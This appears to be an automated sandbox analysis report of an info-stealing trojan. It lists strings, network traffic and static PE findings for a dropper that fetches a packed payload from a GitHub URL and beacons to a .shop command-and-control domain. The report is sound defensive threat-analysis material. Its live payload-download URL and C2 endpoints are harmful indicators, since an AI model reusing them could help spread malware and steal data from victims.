                Source: jyidkjkfhjawd.exe, 00000007.00000003.2034541517.0000000001427000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1860623456.000000000141A000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035408285.000000000142A000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1835357420.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1835525897.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1874194613.000000000141A000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1860268247.0000000001418000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1861493123.00000000042D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1861493123.00000000042D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1861493123.00000000042D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1861493123.00000000042D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1861493123.00000000042D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: eXbhgU9.exe, 00000000.00000002.1816600070.0000000002717000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
                Source: eXbhgU9.exe, 00000000.00000002.1816600070.0000000002717000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.comd
                Source: powershell.exe, 00000002.00000002.1705067078.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1737406894.0000000005F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1861493123.00000000042D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1861493123.00000000042D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: powershell.exe, 00000005.00000002.1728016132.0000000005035000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: eXbhgU9.exe, 00000000.00000002.1816600070.000000000275C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
                Source: eXbhgU9.exe, 00000000.00000002.1816600070.000000000275C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.comd
                Source: powershell.exe, 00000002.00000002.1702719661.00000000045D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1728016132.0000000005035000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: eXbhgU9.exe, 00000000.00000002.1816600070.0000000002691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1702719661.0000000004481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1728016132.0000000004EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000002.00000002.1702719661.00000000045D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1728016132.0000000005035000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                Source: powershell.exe, 00000005.00000002.1728016132.0000000005035000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: jyidkjkfhjawd.exe, 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.enigmaprotector.com/
                Source: jyidkjkfhjawd.exe, 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.enigmaprotector.com/openU
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1861493123.00000000042D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1861493123.00000000042D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1837628332.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1837848299.00000000042D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: powershell.exe, 00000002.00000002.1702719661.0000000004481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1728016132.0000000004EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBkq
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1837628332.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1837848299.00000000042D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1837628332.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1837848299.00000000042D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1837628332.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1837848299.00000000042D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: powershell.exe, 00000005.00000002.1737406894.0000000005F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000005.00000002.1737406894.0000000005F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000005.00000002.1737406894.0000000005F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1837628332.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1837848299.00000000042D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1837628332.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1837848299.00000000042D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1837628332.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1837848299.00000000042D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: jyidkjkfhjawd.exe, 00000007.00000002.2035357975.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1860623456.0000000001436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/
                Source: jyidkjkfhjawd.exe, 00000007.00000003.2034641430.000000000144E000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2034541517.0000000001444000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035445333.000000000144F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/25
                Source: jyidkjkfhjawd.exe, 00000007.00000003.2034641430.000000000144E000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2034541517.0000000001444000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035445333.000000000144F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/B5
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1877546668.0000000001441000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1874194613.0000000001434000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2000269723.0000000001441000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1878429247.0000000001445000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/R5J
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1835357420.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1835525897.00000000013F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/Vg
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1874194613.0000000001434000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/Y
                Source: jyidkjkfhjawd.exe, 00000007.00000003.2034541517.0000000001444000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1835357420.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1874194613.0000000001434000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2000269723.0000000001441000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1835525897.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035445333.000000000144F000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1860108346.00000000042B2000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2034658260.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035445333.0000000001444000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035357975.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/api
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1835357420.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1835525897.00000000013F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/api7
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1860268247.0000000001436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/api_
                Source: jyidkjkfhjawd.exe, 00000007.00000003.2034641430.000000000144E000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2034541517.0000000001444000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035445333.000000000144F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/h
                Source: jyidkjkfhjawd.exe, 00000007.00000003.2034641430.000000000144E000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2034541517.0000000001444000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035445333.000000000144F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/j5B
                Source: jyidkjkfhjawd.exe, 00000007.00000003.2000269723.0000000001441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/s
                Source: jyidkjkfhjawd.exe, 00000007.00000003.2000269723.0000000001441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/z5R
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1877860418.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1878598429.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1835084854.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035303322.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2010143027.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2000292819.00000000013BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop:443/api
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1877860418.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1878598429.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035303322.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2010143027.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2000292819.00000000013BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop:443/apiD
                Source: jyidkjkfhjawd.exe, 00000007.00000002.2035303322.00000000013BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop:443/apin.txtPK
                Source: jyidkjkfhjawd.exe, 00000007.00000002.2035303322.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2010143027.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2000292819.00000000013BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop:443/apitxtPK
                Source: eXbhgU9.exe, 00000000.00000002.1816600070.0000000002704000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                Source: powershell.exe, 00000005.00000002.1728016132.0000000005035000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: eXbhgU9.exe, 00000000.00000002.1816600070.000000000269C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe
                Source: eXbhgU9.exeString found in binary or memory: https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe-Downloading
                Source: eXbhgU9.exe, 00000000.00000002.1816600070.000000000269C000.00000004.00000800.00020000.00000000.sdmp, ConDrv.0.drString found in binary or memory: https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe...
                Source: powershell.exe, 00000002.00000002.1705067078.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1737406894.0000000005F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: eXbhgU9.exe, 00000000.00000002.1816600070.0000000002742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                Source: eXbhgU9.exe, 00000000.00000002.1816600070.0000000002742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/jyidkjkfhjawd.exe
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1838585655.0000000004335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1862690282.00000000045BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1862690282.00000000045BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1839032040.00000000042E7000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1838585655.0000000004333000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1849507128.00000000042E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1839032040.00000000042C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1839032040.00000000042E7000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1838585655.0000000004333000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1849507128.00000000042E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1839032040.00000000042C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1837628332.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1837848299.00000000042D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1837628332.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1837848299.00000000042D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1862690282.00000000045BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1862690282.00000000045BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1862690282.00000000045BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1862690282.00000000045BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1862690282.00000000045BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.18.19:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.18.19:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.18.19:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.18.19:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.18.19:443 -> 192.168.2.4:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.18.19:443 -> 192.168.2.4:49743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.18.19:443 -> 192.168.2.4:49744 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.18.19:443 -> 192.168.2.4:49745 version: TLS 1.2

                System Summary

                barindex
                Source: jyidkjkfhjawd.exe.0.drStatic PE information: section name:
                Source: jyidkjkfhjawd.exe.0.drStatic PE information: section name:
                Source: jyidkjkfhjawd.exe.0.drStatic PE information: section name:
                Source: jyidkjkfhjawd.exe.0.drStatic PE information: section name:
                Source: jyidkjkfhjawd.exe.0.drStatic PE information: section name:
                Source: C:\Users\user\Desktop\eXbhgU9.exeCode function: 0_2_00BE0F400_2_00BE0F40
                Source: C:\Users\user\Desktop\eXbhgU9.exeCode function: 0_2_00BE0F300_2_00BE0F30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0444B4902_2_0444B490
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08123A982_2_08123A98
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0336B4905_2_0336B490
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AF04807_2_00AF0480
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AEBCE07_2_00AEBCE0
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AD60007_2_00AD6000
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AD10607_2_00AD1060
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AE88607_2_00AE8860
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AB95A07_2_00AB95A0
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AD31207_2_00AD3120
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00ABD6F87_2_00ABD6F8
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00ABDE487_2_00ABDE48
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AB86407_2_00AB8640
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AEFB807_2_00AEFB80
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00ABA8A07_2_00ABA8A0
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AD7CB07_2_00AD7CB0
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00ACDC907_2_00ACDC90
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00ABD0FF7_2_00ABD0FF
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AB88F07_2_00AB88F0
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AE80407_2_00AE8040
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AD58507_2_00AD5850
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00ADA0507_2_00ADA050
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AEF4507_2_00AEF450
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AB398B7_2_00AB398B
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00ABAD907_2_00ABAD90
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AC11E97_2_00AC11E9
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AC4DC07_2_00AC4DC0
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AEC5107_2_00AEC510
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AB61607_2_00AB6160
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AE2D707_2_00AE2D70
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00ABED757_2_00ABED75
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AB91407_2_00AB9140
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AB42807_2_00AB4280
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00ABC6F07_2_00ABC6F0
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AEFE207_2_00AEFE20
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AD3A607_2_00AD3A60
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00ABEB807_2_00ABEB80
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AB73C07_2_00AB73C0
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AEF3C07_2_00AEF3C0
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AD37D07_2_00AD37D0
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AD63607_2_00AD6360
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_00AD63407_2_00AD6340
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_032246767_2_03224676
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_0322452F7_2_0322452F
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeCode function: 7_2_032245617_2_03224561
                Source: eXbhgU9.exe, 00000000.00000002.1814080299.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs eXbhgU9.exe
                Source: eXbhgU9.exe, 00000000.00000000.1662025325.00000000003B6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamegamee.exe, vs eXbhgU9.exe
                Source: eXbhgU9.exeBinary or memory string: OriginalFilenamegamee.exe, vs eXbhgU9.exe
                Source: jyidkjkfhjawd.exe.0.drStatic PE information: Section: ZLIB complexity 0.9981477744464945
                Source: jyidkjkfhjawd.exe.0.drStatic PE information: Section: ZLIB complexity 0.99796875
                Source: jyidkjkfhjawd.exe.0.drStatic PE information: Section: .data ZLIB complexity 0.9965319237854804
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/12@3/3
                Source: C:\Users\user\Desktop\eXbhgU9.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\eXbhgU9.exe.logJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0icvfcmw.a3t.ps1Jump to behavior
                Source: eXbhgU9.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
